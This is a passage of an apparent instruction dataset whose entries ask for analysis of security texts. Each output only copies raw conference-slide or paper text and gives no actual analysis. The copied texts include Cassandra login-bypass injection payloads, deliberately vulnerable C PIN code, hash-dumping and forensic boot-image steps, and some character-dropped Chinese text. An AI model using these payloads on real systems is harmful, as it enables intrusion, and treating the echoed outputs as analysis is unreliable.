Network Security  Symbolic Execution  Automata Learning  Network Protocols. 1 Introduction The process of gaining information about a communication protocol from the binary code that implements it is called Protocol Inference. Such a process is employed in several practical scenarios. Many malwares set up a command and control (C&C) channel with the attackers server. Over that channel they re- ceive commands from the server and send information gathered from the victim machine. Oftentimes, knowing the commands expected to be received by the malware is helpful to analyze the goals and logic of the malware. Nonetheless, these commands may not be easily obt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# RFID复制卡 > 文章作者 [Sarah-Briggs](https://github.com/Sarah-Briggs) & [r0fus0d](https://github.com/No-Github) --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 复制卡 我们准备相应的阅读器读取原门禁卡的数据如果该卡没有保护机制那么里面的数据可以轻松读取出来如果该卡有保护就要破解它的密码然后进行读取数据 我们只要将扇区的数据复制到一张新的卡里就算取得成功这是针对防御性能很低的门禁卡而言像复杂的带有防火墙的门禁识别或者是滚动码破解就没有这么简单扇区数据有兴趣可以自己研究这里不做赘述 接下来我们将数据复制到一张新卡要所有的扇区数据写入成功才行这里我做了标记以示区别 --- ## 现场检验 首先原来的门禁卡可以开门是毋庸置疑的我们接下来主要进行检验这张复制卡 该电子门可以通过输入密码和刷卡两种方式进入现在是紧闭状态无法开门 现在掏出我们准备的这个复制卡进行刷卡操作 由于无法上传视频实际的情况是卡刷上以后密码机会嘀的响一声然后门就可以打开了图见如下", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRE-TARGETABLE GRAMMAR BASED TEST CASE GENERATION JOE ROZNER / @JROZNER TESTING PARSERS IS HARD 2 HOW WE GOT HERE  Mostly black box (ish) implementation of complex languages (context-free-ish)  ~35k lines of grammar in total (ANTLR)  Implemented from incomplete, inaccurate, and contradictory documentation  Radically different parsing algorithm(s) from original implementations  Lack of public test cases for most dialects 3 PROBLEM AREAS FOR PARSING OVERFIT/UNDERFIT GRAMMAR DEFINITION  Does the parser accurately recognize the language?  Lack of access to real grammars  Poor documentation  Differences in parsing algorithms means differences in grammar definition  Ambiguity, recursion, precedence differences  Universally proving CFG equivalence is undecidable TREE GENERATION FLAWS  Does the parse tree accurately represent the sentence?  Shows the syntactic relationship between tokens  Most parser generators require manual tree construction  Typically this stage translates string data to its real type representation 6 lexer_body_part: ast::Operation = { <r:UpperId> <q:Quantifier*> => ast::unroll_quantifier(q, ast::Operation::Token(r)), <l:StringLiteral> \"..\" <r:StringLiteral> => ast::Operation::Range((l, r)), <r:StringLiteral> <q:Quantifier*> => ast::unroll_quantifier(q, ast::Operation::StringLiteral(r)), \"(\" <r:LexerBody> \")\" <q:Quantifier*> => ast::unroll_quantifier(q, ast::Operation::Group(r)), \".\" <q:Quantifier*> => ast::unroll_quantifier(q, ast::Operation::Any), CharacterClass <q:Quantifier*> => ast::unroll_quantifier(q, ast::Operation::CharacterClass), }; UNSAFE/INCORRECT VALIDATED INPUT  Have we validated that the input is safe and correct?  Correct parsing proves validity but doesnt ensure future proper handling  Syntactic/Semantic correctness doesnt ensure safety  Opaque handling of tokens is fairly common due to language complexity  Once youre past the parser its back to smashing the stack/logic flaws/etc 8 HOW DO WE TEST THIS? GETTING MORE TEST CASES  Write by ha", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nClick to edit Master subtitle style Stamp Out Hash Corruption, Crack All the Things! Ryan Reynolds  Manager, Crowe Horwath  Pentester  Twitter: @reynoldsrb Jonathan Claudius  SpiderLabs Security Researcher, Trustwave  Vulnerability Research  Twitter: @claudijd Whats inside?  Windows Hash Extraction  Story of What We Found  Windows Hash Extraction Mechanics  A Different Approach  Why Are All the Tools Broken?  Demo  Patches Click to edit Master subtitle style Lets talk about hashes!!! Goals of Getting Hashes  Privilege Escalation  Password Analysis  Forensics Investigations Windows Password Hashes  Two Types of Hashes:  LM (Lan Manager)  Old Hashing Algorithm w/ Security Flaws  Case insensitivity, Broken into 2 Components  NTLM (NT Lan Manager)  Newer Hashing Algorithm w/ Security Flaws  Not salted, but is case sensitive Windows Password Hashes  Two Methods to Get Hashes:  Injection via LSASS  Reads hashes from memory  Registry Reading via SAM/SYSTEM  Reads hashes from local registry hives Click to edit Master subtitle style Story Time Failed Attempt 1  Social Engineering Engagement  Gained Physical Access  Dumped Hashes on a Bank Workstation  Failed to Crack  John the Ripper  Rainbow Tables Failed Attempt 2  Internal Penetration Assessment  Popped a Shell via Missing Patch  Dumped Hashes on System  Fail to Crack  Rainbow Tables (via all LM Space & French)  Pass the Hash (PTH) Example Hashes  Via Registry (Metasploit)  LM: 4500a2115ce8e23a99303f760ba6cc96  NTLM: 5c0bd165cea577e98fa92308f996cf45  Via Injection (PwDump6)  LM: aad3b435b51404eeaad3b435b51404ee  NTLM: 5f1bec25dd42d41183d0f450bf9b1d6b Bug Report Our Powers Combined  Beers  Hacking  More Beers Click to edit Master subtitle style Where Do Hashes Live? Where Do Hashes Live?  HKLM\\SAM  Store security information for each user (including hash data)  HKLM\\SYSTEM  Stores the SYSKEY (salts the SAM information for security purposes) What The Registry Looks Like  HKLM\\SAM\\SAM\\domains\\account\\users\\  Users: 000001F4,", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1588-006-获取能力-漏洞 ## 来自ATT&CK的描述 攻击者可能会获得有关漏洞的信息这些信息可以在确定攻击目标的方法时使用漏洞是计算机硬件或软件中的一个弱点它有可能被攻击者利用导致发生非预期或意料之外的行为攻击者可以通过搜索开放的漏洞数据库或进入封闭的漏洞数据库来寻找漏洞信息 攻击者可以监视漏洞披露数据库以了解现有的以及新发现的漏洞状况在发现漏洞和公开漏洞之间通常会有延迟攻击者可能会把那些已知存在漏洞的系统作为目标包括商业供应商对漏洞的了解可能会使攻击者寻找现有的漏洞或试图自己挖掘出一个漏洞 ## 测试案例 暂无 ## 检测日志 无法有效监测 ## 测试复现 无 ## 测试留痕 无 ## 检测规则/思路 无 ## 建议 ### 缓解措施 这种技术不容易用预防控制来缓解因为它是基于企业防御和控制范围之外的行为 ### 检测 大部分此类活动将在目标组织的可见性之外进行因此很难检测到这种行为检测工作可能侧重于与漏洞利用的潜在使用相关的行为即利用面向公众的应用程序利用客户端执行利用特权升级利用防御规避利用凭据访问利用远程服务以及应用程序或系统开发 ## 参考推荐 MITRE-ATT&CK-T1588-006 <https://attack.mitre.org/techniques/T1588/006/>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1018-win-检测nbtscan活动 ## 来自ATT&CK的描述 攻击者可能试图通过IP地址主机名或网络上其他可用于从当前系统进行横向移动的逻辑标识符来获取其他系统的列表远程访问工具中存在类似的功能来可以实现此目的但是也可以使用操作系统上可用的实用程序例如Ping或net view攻击者还可以使用本地主机文件例如C:\\Windows\\System32\\Drivers\\etc\\hosts或/etc/hosts来发现主机名到远程系统的IP地址的映射 bonjour协议特定于macOS用于在同一广播域中发现其他基于Mac的系统 ## 测试案例 Nbtscan.exe是一款用于扫描Windows网络上NetBIOS名字信息的程序该程序对给出范围内的每一个地址发送NetBIOS状态查询并且以易读的表格列出接收到的信息对于每个响应的主机NBTScan列出它的IP地址NetBIOS计算机名登录用户名和MAC地址但只能用于局域网,NBTSCAN可以取到PC的真实IP地址和MAC地址如果有ARP攻击在做怪可以找到装有ARP攻击的PC的IP/和MAC地址但只能用于局域网,NBTSCAN可以取到PC的真实IP地址和MAC地址如果有ARP攻击在做怪可以找到装有ARP攻击的PC的IP/和MAC地址NBTSCAN可以取到PC的真实IP地址和MAC地址如果有ARP攻击在做怪可以找到装有ARP攻击的PC的IP/和MAC地址总之NBTSCAN可以取到PC的真实IP地址和MAC地址 ## 检测日志 windows 安全日志 ## 测试复现 ```yml C:\\Users\\12306br0\\Desktop\\test>nbtscan-1.0.35.exe 10.211.55.1/24 10.211.55.2 \\MACBOOKPRO-3EAA *timeout (normal end of scan) ``` ## 测试留痕 ```yml 4688已创建新进程 创建者主题: 安全 ID: 361A\\12306br0 帐户名: 12306br0 帐户域: 361A 登录 ID: 0x507DC 目标主题: 安全 ID: NULL SID 帐户名: - 帐户域: - 登录 ID: 0x0 进程信息: 新进程 ID: 0x135c 新进程名称: C:\\Users\\12306br0\\Desktop\\test\\nbtscan-1.0.35.exe 令牌提升类型: %%1938 强制性标签: Mandatory Label\\Medium Mandatory Level 创建者进程 ID: 0xc68 创建者进程名称: C:\\Windows\\System32\\cmd.exe 进程命令行: nbtscan-1.0.35.exe 10.211.55.1/24 ``` ## 检测规则/思路 ### sigma规则 ```yml title: 检测nbtscan活动 description: windows server 2016本检测规则参考Microsoft威胁防护团队发布的Operation Soft Cell威胁分析报告Soft Cell行动是一系列针对全球电信提供商的用户呼叫日志的运动这些攻击最早可以追溯到2012年nbtscan.exe是一种合法的MS-DOS命令行工具用于发现本地或远程TCP/IP网络上的任何NETBIOS名称服务器 references: https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Discovery/detect-nbtscan-activity.md tags: T1018 status: experimental author: 12306Bro logsource: product: windows service: security detection: selection: EventID: 4688 #进程创建 Newprocessname: '*nbtscan*.exe' #进程信息>新进程名称 condition: selection level: low ``` ### 建议 基于非系统自带进程名称的检测方法始终是不太靠谱的当攻击者修改进程名称后就无法通过进程名称进行检测可以通过部署Sysmon利用进程hash值进行检测 ## 相关TIP [[T1018-win-远程系统发现]] ## 参考推荐 MITRE-ATT&CK-T1018 <https://attack.mitre.org/techniques/T1018/> 检测nbtscan活动 <https://github.com/microsoft/Micr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 2  Who are we  Background  Picking our battles  The web vuln  Intermission  Telematics  What is it  Local vulnerabilities discovered  Writing a blind exploit  Remote vulnerability  Conclusion  Questions Jesse @jessemichael Mickey @HackingThings Alex @ABazhaniuk https://www.mcafee.com/us/threat-center/advanced-threat-research/index.aspx 3 4  Last year was awesome 5  After we were done with our previous hackary, we wanted to try something new  We want to deepen our knowledge and experience with automotive security 6  After we were done with our previous hackary, we wanted to try something new  We want to deepen our knowledge and experience with automotive security  Actual car hacking experience is at 0% 7  Autonomous vehicles  Tesla Autopilot  Comma.io  Google self driving car  UBER  Connected cars  Autonomous  V2X  V2V  Drive by wire systems  how does it all work? 8  Charlie Miller and Chris Valasek  Troy Hunt and Scott Helme - Nissan web API hack  Marc Rogers et al.(Tesla hack 2015)  Keen Labs Tesla hack  And more... 9  Budget?  Where do we start? 10  Budget?  Where do we start?  We already pwned an after market IVI , what is next? *IVI = In-Vehicle Infotainment System 11  Budget?  Where do we start?  We already pwned an after market IVI , what is next? *IVI = In-Vehicle Infotainment System  Ok, Lets go the wrecking yard and look around 12  Funny story about the wrecking yard. 13  Funny story about the wrecking yard.  A junk yard != wrecking yard.  Looking for a late model OEM IVI.  What do you have?  An F150 that got into a brawl with a wall and lost  a few more squashed cars that are too short  one almost perfect car  So we ended up selecting a car by happenstance, totally random. 14  Nice car!  Can you spot what caused it to be Totaled? 15  GIMME THAT DASHBOARD! 16  1 week later  carception 17  A trip to Lowes and a few hours later 18  Once it is fully assembled it kinda works  A few errors appear on the instrument panels.  We need to get this thing on the tabl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n短网址攻击与防御 演讲人彦修 2 0 1 8 About Me  腾讯安全工程师  微博:@彦修_  喜美食好读书不求甚解  Tencent Blade Team  由腾讯安全平台部创立  专注于AI移动互联网IoT无线电等前沿技术领域安全研究  报告了谷歌苹果亚马逊等多个国际知名厂商70+安全漏洞 PART 01 短网址猜想 目录 CONTENTS PART 02 何谓短网址 PART 03 短网址攻击实战 PART 04 扩展短网址攻击面 01 02 03 04 PART 05 短网址防御实践 05 PART 01 短网址猜想 某个惠风和畅的下午收到这么一封邮件 改变短网址后缀是否可以获取他人的发票链接 由短网址http://xx.com/t/vWiN39 > http://xx.com/t/vWiN40 进而 http://xx.cn/t/vWiN39 http://xx.to/t/vWiN39  我们随后进行了大批量随机爆破测试部分结果如下 短网址第一猜想 当你发现某处出现了问题那么出现问题的一般不止这一处 短网址第二猜想 如果你要解决一个问题你需要知道这个问题是什么 短网址第三猜想 PART 02 何谓短网址 短网址此服务可以提供一个非常短小的URL以代替原来的可能较长的URL将长的 URL地址缩短用户访问缩短后的URL时通常将会重定向到原来的URL摘自维基 百科 比如微博中常见的http://t.cn/h5BBi 短网址服务主要起源于一些具有字数限制的微博客服务现在广泛用于短信邮件 等 自用短网址服务产品部分 第三方短网址服务产品部分 长网址转换短网址 短网址转换长网址 用户 转换算法 数据库 URL处理 远程访问 URL 资 源 长URL 短URL 用户 数据库 URL 资 源 短URL 302(1)请求 重定向 request response request response 短网址服务 短网址服务 我们分析了GITHUB上star数最多的10个短网址开源项目其转换算法大致分为三类即进制算法 HASH算法和随机数算法 进制算法结果连续 随机数算法结果不连续 HASH算法结果不连续 进制算法 算法简述一个以数字大小写字母共62个字符的任意进制的算法 数据库中ID递增当ID为233则对应短网址计算过程如下 ① 设置序列为0123456789abcdefghijklmnopqrstuvwxyz ② 233/36=6 ③ 233%36= 17 ④ 依次取上述字符的6位17位则为6h 其生成之后的短网址为xx.xx/6h 随机数算法 算法简述每次对候选字符进行任意次随机位数选择拼接之后检查是否重复 若要求位数为2则其对应短地址为计算过程如下 ① 设置字符序列0123456789abcdefghijklmnopqrstuvwxyz ② 根据字符个数设置最大值为35最小值为0取2次随机数假设为6,17 ③ 依次取上述字符的6位和17位则为6h 其生成之后的短网址为xx.xx/6h HASH算法 算法简述对id进行hash操作 可选利用随机数进行加盐并检查是否重复 设置ID自增若ID=233则其对应短地址为计算过程如下 ① 取随机数为盐 ② 对233进行sha1加密为 aaccb8bb2b4c442a7c16a9b209c9ff448c6c5f35:2 ③ 要求位数为7直接取上述加密结果的前7位为aaccb8 其生成之后的短网址为xx.xx/2e8c027 PART 03 短网址攻击实战 根据短网址第一猜想 当你发现某处出现了问题那么出现问题的一般不止这一处 存在短网址问题并非上述一家例子中的厂商 所以如何高效有效爆破 短网址爆破最佳实践 字典生成模块 请求模块 算法识别模块 request response 代 理 IP 池 模 块 响应解析模块 配置检测模块 远程服务器 数 据 库 存 储 模 块 算法识别第三方进制算法 可以多次输入网址查看返回短网址是否连续连续则为进制算法如下 Tips个别为分布式短链接id非单一递增会出现多个字符规律变化如87BNwj 87BO8287BOqw87BOGz87BPpD ① 直接测试xx.xx/1及xx.xx/2 等低位后缀 ② 对存在记录的后缀单字母进行增加或减少测试若均存在记录或者有规律存在记录 若某短网址存在http://xx.xx/Abzc4 对Abzc4中最后一个单字符{0-Z}共62次变化若均 存在记录或存在ace等有规律间隔情况则基本可以认为使用了进制算法 算法识别自营进制算法 可以多次输入网址查看返回短网址是否连续不连续无规律则为HASH算法&随机数算法 算法识别第三方HASH&随机数算法 ① 直接访问xx.xxx/1及xx.xxx/2低位等后缀若均不存在则进行步骤2 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDemystifying Modern Windows Rootkits Bill Demirkapi Independent Security Researcher 1 Demystifying Modern Windows Rootkits  DEF CON 28 Who Am I?  19 years old  Sophomore at the Rochester Institute of Technology  Windows Internals  Mostly self-taught (with guidance)  Strong Game Hacking background 2 Demystifying Modern Windows Rootkits  DEF CON 28 What Is This Talk About? In this talk, well go over  Loading a rootkit.  Communicating with a rootkit.  Abusing legitimate network communications.  An example rootkit I wrote and the design choices behind it.  Executing commands from kernel.  Tricks to cover up the filesystem trace of your rootkit. Demystifying Modern Windows Rootkits  DEF CON 28 3 Introduction to Windows Rootkits Demystifying Modern Windows Rootkits  DEF CON 28 4 Windows Rootkits: An Overview Why would you want to use a rootkit?  Kernel drivers have significant access to the machine.  Same privilege level as a typical kernel anti-virus.  Less mitigations and security solutions targeting kernel malware.  Anti-Virus often have less visibility into operations performed by kernel drivers.  Kernel drivers are often ignored by anti-virus. Demystifying Modern Windows Rootkits  DEF CON 28 5 Example: Treatment by Anti-Virus Anti-virus tends to treat kernel drivers with significant trust compared to user-mode applications. Demystifying Modern Windows Rootkits  DEF CON 28 6 Excerpt from Carbon Blacks Process/Thread Handle callbacks Excerpt from Malwarebytes Process/Thread Handle callbacks Loading a Rootkit Demystifying Modern Windows Rootkits  DEF CON 28 7 Abuse Legitimate Drivers There are a lot of vulnerable drivers. With some reversing knowledge, finding a 0-day in a driver can be trivial. Examples include  Capcoms Anti-Cheat driver  Intels NAL Driver  Microsoft themselves! Demystifying Modern Windows Rootkits  DEF CON 28 8 Abuse Legitimate Drivers Using legitimate drivers has quite a few benefits too:  You only need a few primitives to escalate privilege.  Findin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAuthor Damian Finol Venezuelan Engineer in Informatics Currently doing a Masters in Computer Science with focus on Distributed systems and paralellism Working as an Information Security Specialist for a venezuelan Bank Teaching Databases, Operating Systems and Data Security at Universidad Nueva Esparta Totalfarker Project in a nutshell Started as Wi-Fi mapping of Caracas, Venezuela Seeks to understand if the difference in wealth affects network security The future?, electronic fences over wireless? Venezuela Located in South America Has a GDI of 0.826 Over 53% of the population lives under extreme poverty 20% of the population has access to the Internet. 86% of Venezuelans have a mobile phone (2nd in Latin America) 45%+ access internet from their homes, 27% of them get it from Wi-Fi Cafés. 67% of Internet users come from the D and E status (Poorest users) Most of the poor live in slums located in the extreme east (Petare) and extreme west (Catia, 23 de Enero, etc) Two big Slums in Caracas, One located to the west (left) The other to the east (right) Internet connections available using 3G modems, EVDO / EDGE Cell networks and WIMAX. Low physical security: houses (ranchos) are built using mud, adobes and zinc ceilings Slums Wealthy neighborhoods Mostly in the Eastern and south eastern side of the city Patches of high density high rise buildings (Mostly in the East) and houses / mansions in the South East. Internet connections are mostly DSL and Cable Wi-Fi Cafés almost inexistent Buildings are built with concrete (unlike Americans card box constructions) Strong physical security: Electric fences, watch guards, dogs, motion detection sensors, bulletproof windows and cars, cameras, gated communities. Slum version of Boingo SSID Has owners Cell number Phone cards are used to purchase wi-fi key Key is reissued Sunday evening Requires strong security: WPA/WPA2 Internet use is mostly recreational (Messenger), Crime (Identity theft, investigating kidnap victims, blackmail) ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInternet Kiosk Terminals The Redux Paul Craig  Security-Assessment.com Defcon 19  Las Vegas  Hello Defcon 19  My name is Paul Craig  I work at Security-Assessment.com as a penetration tester.  I love to hack stuff, its my life, and my profession.  If you have any questions or comments  Please email me  Paul@ha.cked.net People in my life have told me that I have an Addictive Personality My obsession with Kiosk hacking began to have a negative effect on my life Hacking Kiosks controlled me. Paul, You just need a distraction  My colleagues at SA know me as That Crazy Kiosk Guy  All I do is Hack Internet Kiosks  Its my secret addiction.  Whenever I see an Internet Kiosk, I have to hack it.  I cant stop myself.  I have a problem, its an addiction.  The 8 Stages of Grief: #7 Acceptance  Someone has to be hacking these damn Kiosks, so why not you?  I am the only guy in the world with a Kiosk addiction. Without my effort the vendors might win.  I decided to take ownership of my passion  Embrace my addiction  Ill just fucking hack all of them  Every vendor, every product, every platform.  Yeah fuck it, why not.?  One guy from NZ vs The Kiosk Software Industry  The Overview  What is a Kiosk  How Kiosk Security Works  What is iKAT  My Methodology and Approach  iKAT v4  Whats New  Demos, Demos, Demos, Demos  Hacking Kiosks with Paul  Live Demos  What is an Internet Kiosk ?  A machine that takes payment to let you surf the internet  Typically an x86 desktop running Windows or Linux  Found at hotels, motels, airports, libraries, lobbies, casinos.. They look like this: How Kiosks Are Secured  Kiosk vendors take security seriously  The majority of functionality in Kiosk software is security related  A secure Kiosk is an expensive Kiosk  Lock Downed, Secured, Hardened, Protected Environments This is because hackers LOVE hacking Kiosks! How Kiosks Are Secured 1. User Interface Security  Graphically jailed into a Kiosk interface  Cut-down/reduced functionality desktop  No way to get b", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nModule 1 A journey from high level languages, through assembly, to the running process https://github.com/hasherezade/malware_training_vol1 Basics of PE (Portable Executable) Basics of a PE file  PE (Portable Executable) is a native executable format on Windows  PE files:  user mode: EXE, DLL  kernel mode: driver (.sys), kernel image (ntoskrnl.exe)  UEFI (run in SMM  System Managemant Mode)  Also OBJ files have structures similar to PE Basics of a PE file PE (Portable Executable) contains information:  What to execute: the compiled code  How to execute: headers with data necessary for loading it remcos.exe Basics of a PE file  PE format is based on a Unix format COFF  that was used in VAX/VMS  It was introduced as a part of specification Win32  Throughout many years, the core of the format didnt change, only some new fields of some structures have been added  Since introduction of 64 bit environment, PE needed to be adjusted to it: 64 bit PE was introduced  Also, new variants have been introduced, like .NET PE  containing additional structures with intermediate code and metadata Basics of a PE file PE file structure: the DOS part (legacy) and the Windows Part https://github.com/hasherezade/malware_training_vol1/blob/main/exercises/module1/lesson2_pe/pe_snippets/pe_hdr.h Basics of a PE file DOS Header: only e_magic, and e_lfnew must be filled: typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header WORD e_magic; // Magic number -------------------------------------------> MZ WORD e_cblp; // Bytes on last page of file WORD e_cp; // Pages in file WORD e_crlc; // Relocations WORD e_cparhdr; // Size of header in paragraphs WORD e_minalloc; // Minimum extra paragraphs needed WORD e_maxalloc; // Maximum extra paragraphs needed WORD e_ss; // Initial (relative) SS value WORD e_sp; // Initial SP value WORD e_csum; // Checksum WORD e_ip; // Initial IP value WORD e_cs; // Initial (relative) CS value WORD e_lfarlc; // File address of relocation table WORD e_ovno; // Overlay number", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Cassandra Injection > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system ## Summary * [Cassandra comment](#cassandra-comment) * [Cassandra - Login Bypass](#cassandra---login-bypass) * [Login Bypass 0](#login-bypass-0) * [Login Bypass 1](#login-bypass-1) * [References](#references) ## Cassandra comment ```sql /* Cassandra Comment */ ``` ## Cassandra - Login Bypass ### Login Bypass 0 ```sql username: admin' ALLOW FILTERING; %00 password: ANY ``` ### Login Bypass 1 ```sql username: admin'/* password: */and pass>' ``` The injection would look like the following SQL query ```sql SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING; ``` ## References", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n设备 皆有 故障! 全面沦陷:噪声攻击与IOT设备的 10+年年战争 目录 概述 FI 的发展和现状 FI的实际应用 FI的预防 问题在哪? const char *PIN = \"19379148\" // Compare the PIN with the correct one // Return true if different bool comparePIN(char *pin) { for (int i=0; i<strlen(pin); i++) { if (pin[i]!=PIN[i]) return true; } return false; } // Authenticate PIN. // Return true if incorrect bool pinAuthentication() { char pin[80]; char tmp[80]; bool result=false; printf(\"Please, introduce PIN\\r\\n\"); gets(pin); result = comparePIN(pin); if (result == false) { sprintf(tmp,\"PIN correct\\r\\n\"); } else { sprintf(tmp,\"PIN %s is incorrect\\r\\n\",pin); } printf(tmp); return result; } 问题在哪? const char *PIN = \"19379148\" // Compare the PIN with the correct one // Return true if different bool comparePIN(char *pin) { for (int i=0; i<strlen(pin); i++) { if (pin[i]!=PIN[i]) return true; } return false; } // Authenticate PIN. // Return true if incorrect bool pinAuthentication() { char pin[80]; char tmp[80]; bool result=false; printf(\"Please, introduce PIN\\r\\n\"); gets(pin); result = comparePIN(pin); if (result == false) { sprintf(tmp,\"PIN correct\\r\\n\"); } else { sprintf(tmp,\"PIN %s is incorrect\\r\\n\",pin); } printf(tmp); return result; } 问题在哪? const char *PIN = \"19379148\" // Compare the PIN with the correct one // Return true if different bool comparePIN(char *pin) { for (int i=0; i<strlen(PIN); i++) { if (pin[i]!=PIN[i]) return true; } return false; } // Authenticate PIN. // Return true if incorrect bool pinAuthentication() { char pin[80]; char tmp[80]; bool result=false; printf(\"Please, introduce PIN\\r\\n\"); fgets(pin,sizeof(pin),stdin); result = comparePIN(pin); if (result == false) { sprintf(tmp,\"PIN correct\\r\\n\"); } else { sprintf(tmp,\"PIN %s is incorrect\\r\\n\",pin); } printf(\"%s\",tmp); return result; } 它现在是否 安全? 问题在哪? const char *PIN = \"19379148\" // Compare the PIN with the correct one // Return true if different bool comparePIN(char *pin) { for (int i=0; i<strlen(PIN); i++) { if (pin[i]!=PIN[i]) return true; } return false; } // Authenticat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGaining Access to Android User Data Into The Droid DEF CON 20 Introduction  Why this talk is useful  Defend access / gain access  Device seizure, loss, border crossing, stop and search, espionage...  The company  viaForensics - Mobile security and digital forensics, strong R&D team, government agencies and corporations  The speaker  Thomas Cannon - Director of Breaking Things Challenges  ADB off by default  Screen lock  Code signing for updates and boot images  Encryption  Variety of device hardware, software and configuration Bootloader Essentials  How we use the bootloader  Accessing bootloader mode  Bootloader protocols  Bootloader protection Defeat The Bootloader  S-ON vs S-OFF  @secuflag controlled in radio firmware  Gold Card - specially formatted MicroSD card can bypass carrier ID check when flashing ROMs  White Card - special SIM card used as an authentication token to control access to diagnostic mode HTC Example Defeat The Bootloader  Emulate White Card with hardware, combine with Gold Card to enter diagnostics and clear S-ON HTC Example Defeat The Bootloader  White Card not needed for CDMA phones  Once S-OFF, can RAM load a custom boot image  This technique wipes most devices! But not all.  Successfully used this technique to gain access to some locked stock HTC devices such as HTC Desire  Try it yourself with an XTC Clip HTC Example Forensic Boot Image  Start early in the boot chain before the system loads  Provide ADB root shell over USB which can be used to image the device  Do not mount anything, including cache, to prevent any writes to partitions  Devices with raw NAND flash and wear levelling implemented in software (YAFFS2) can be prevented from overwriting deleted data Build Boot Image $ abootimg -x stock-recovery.img $ abootimg-unpack-initrd $ cd ramdisk (edit ramdisk contents) $ cd .. $ abootimg-pack-initrd -f $ abootimg -u stock-recovery.img -r initrd.img RAM Disk Contents /dev /proc /sbin adbd busybox (+ symlinks) nanddump (to dump partitions) /sy", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMac OS X Server System Image Administration For Version 10.3 or Later 034-2348_Cvr 9/12/03 10:21 AM Page 1  Apple Computer, Inc.  2003 Apple Computer, Inc. All rights reserved. The owner or authorized user of a valid copy of Mac OS X Server software may reproduce this publication for the purpose of learning to use such software. No part of this publication may be reproduced or transmitted for commercial purposes, such as selling copies of this publication or for providing paid-for support services. Use of the keyboard Apple logo (Option-Shift-K) for commercial purposes without the prior written consent of Apple may constitute trademark infringement and unfair competition in violation of federal and state laws. Apple, the Apple logo, AirPort, AppleShare, iBook, iMac, Mac, Macintosh, Mac OS, PowerBook, Power Mac, and Xserve are trademarks of Apple Computer, Inc., registered in the U.S. and other countries. 034-2348/09-20-03 LL2348.Book Page 2 Thursday, August 21, 2003 10:58 AM 3 1 Contents Chapter 1 7 About System Image Administration 7 NetBoot and Network Install 8 Inside NetBoot 8 Disk Images 8 NetBoot Share Points 9 Client Information File 9 Shadow Files 10 NetBoot Image Folders 11 Property List File 13 Boot Server Discovery Protocol (BSDP) 13 BootP Server 13 TFTP and the Boot Files 13 Using Images Stored on Other Servers 13 Security 14 Before You Set Up NetBoot 14 What You Need to Know 14 Client Computer Requirements 15 Network Hardware Requirements 15 Network Service Requirements 16 Capacity Planning 17 Setup Overview Chapter 2 19 Creating Boot and Install Images 19 Creating Mac OS X Boot Images 19 Creating a Mac OS X Boot Image 21 Installing the Classic Environment on a Mac OS X Disk Image 21 Configuring Directory Access for a Boot Image 22 Adding an OS Update Package to a Mac OS X Boot Image 22 Creating a Mac OS X Boot Image From an Existing System 23 Synchronizing an Image With an Updated Source Volume 23 Choosing the Protocol Used to Deliver an Image 24 Compr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 脱壳-java anti-decompiler保护脱壳 前 脱壳思路 脱壳效果 开源地址 有天脚本想开发个具但脚本不想从头构思设计代码框架就找找业界有没有 好的具能不能抄抄终于在脚本快乐星球找到个看起来还不错的具但存在个问题 这个具有代码保护壳脚本本来想当裁缝的可没想到还得先变成脱壳才 正硬刚解密算法是种思路但所需要花费的时间太性价不是很并且由于笔者太菜 了浅尝了下发现不太容易搞定这采CSAgent的形式通过注标程序替换壳代码的解密 加载过程直接将解密后的代码写到件当中 解密加载代码在JavaLauncherIdea$Decoder的loadJars法当中 其中类CipherInputStream的作就是读取加密状态的件所以我们只需要在这将 CiperInputStream获取的件流读取出来然后写到本地件即可 前 脱壳思路 2 这有个坑就是在壳代码当中有个判断启动java进程的命令参数当中是否包含- XX:+DisableAttachMechanis并且这个选项是否是效的代码位置在JavaLauncherIdea的main法 中 要是启动参数当中没有加这个选项或者没有效就会创建新JVM进程并且在新进程启动参数 中添加-XX:+DisableAttachMechanis Java 复制代码 if (jvmArgs.contains(\"-XX:+DisableAttachMechanism\") && jvmArgs.lastIndexOf(\"-XX:-DisableAttachMechanism\") < jvmArgs.lastIndexOf(\"-XX:+DisableAttachMechanism\")) { JavaLauncherIdea launcher = new JavaLauncherIdea(); try { launcher.run(args); } catch (Throwable var6) { 